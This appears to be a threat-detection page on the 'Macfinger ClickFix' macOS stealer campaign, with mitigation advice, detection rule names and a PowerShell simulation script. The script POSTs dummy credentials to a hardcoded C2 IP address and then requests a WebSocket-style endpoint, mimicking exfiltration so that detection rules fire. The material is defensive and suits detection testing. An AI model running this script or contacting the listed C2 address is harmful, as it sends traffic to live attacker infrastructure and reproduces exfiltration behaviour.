Macfinger ClickFix Campaign: Analyzing the Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The Macfinger ClickFix campaign delivers an unidentified macOS information stealer through fake CAPTCHA verification pages. The attack uses shell scripts to retrieve architecture-specific Mach-O binaries for either Intel or Apple Silicon systems. Once launched, the malware requests broad system permissions and exfiltrates sensitive information through HTTP POST requests and WebSocket-based communication.
Investigation
The investigation focused on an infection observed on a macOS 27.0 host. Analysts traced the initial shell script loader, the subsequent retrieval of Mach-O binaries, and the malware’s command-and-control communication patterns. The research also differentiated the threat from the previously documented AMOS Stealer based on differences in persistence, data collection, and exfiltration behavior.
Mitigation
Users should avoid interacting with suspicious browser-based CAPTCHA prompts or executing unexpected terminal commands provided by websites. Organizations should monitor for unauthorized changes to LaunchAgents and suspicious downloads written to the /Library/Caches directory. Limiting administrative privileges can also reduce the malware’s ability to obtain the system-wide permissions required for execution.
Response
When Macfinger-related activity is detected, isolate the affected macOS endpoint from the network to prevent further data exfiltration. Perform forensic analysis of the /Library/LaunchAgents/ and /Library/Caches/ directories to identify persistence artifacts. Review system logs for unauthorized permission requests and access to sensitive locations such as Documents, Desktop, and Downloads.
Attack Flow
Detections
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
IOCs (HashSha256) to detect: A Closer Look at Malware From the Macfinger ClickFix Campaign
IOCs (SourceIP) to detect: A Closer Look at Malware From the Macfinger ClickFix Campaign
IOCs (DestinationIP) to detect: A Closer Look at Malware From the Macfinger ClickFix Campaign
Detect Macfinger ClickFix C2 Traffic and Data Exfiltration [HTTP Traffic]
Detection of Macfinger ClickFix Campaign Infection [macOS Process Creation]
Simulation Execution
-
Attack Narrative & Commands: The adversary has successfully gained initial access and is attempting to exfiltrate harvested credentials. To avoid detection by standard web filters, they use a custom Go-based agent. The agent is programmed to send a POST request containing user credentials to the C2 endpoint
/api/credentials. Following this, it establishes a WebSocket connection to/api/tto receive further instructions. The simulation will use PowerShell to spoof these specific HTTP characteristics (IP, User-Agent, and URI) to trigger the detection rule. -
Regression Test Script:
# Simulation of Macfinger C2 Traffic $C2_IP = "95.163.153.80" $UserAgent = "Go-http-client/1.1" Write-Host "[+] Starting Macfinger Simulation..." -ForegroundColor Cyan # 1. Simulate Data Exfiltration via HTTP POST Write-Host "[+] Attempting Data Exfiltration (POST /api/credentials)..." -ForegroundColor Yellow try { $exfilParams = @{ Uri = "http://$($C2_IP)/api/credentials" Method = "POST" UserAgent = $UserAgent Body = "user=admin&pass=P@ssword123" ContentType = "application/x-www-form-urlencoded" } Invoke-RestMethod @exfilParams } catch { Write-Host "[-] Request failed (Expected if IP is not reachable): $($_.Exception.Message)" -ForegroundColor Gray } # 2. Simulate Command & Control via WebSocket (Simulated via HTTP GET to the specific URI) # Note: True WebSocket handshakes require specific libraries, but for network telemetry, # the initial GET request to the URI is the primary trigger. Write-Host "[+] Attempting WebSocket Handshake (GET /api/t)..." -ForegroundColor Yellow try { $wsParams = @{ Uri = "http://$($C2_IP)/api/t" Method = "GET" UserAgent = $UserAgent } Invoke-RestMethod @wsParams } catch { Write-Host "[-] Request failed (Expected if IP is not reachable): $($_.Exception.Message)" -ForegroundColor Gray } Write-Host "[+] Simulation Complete." -ForegroundColor Cyan -
Cleanup Commands:
# No persistent artifacts are created by this simulation script. # Ensure no active connections to the target IP remain. Get-NetTCPConnection -RemoteAddress 95.163.153.80 -ErrorAction SilentlyContinue | Remove-NetTCPConnection -Confirm:$false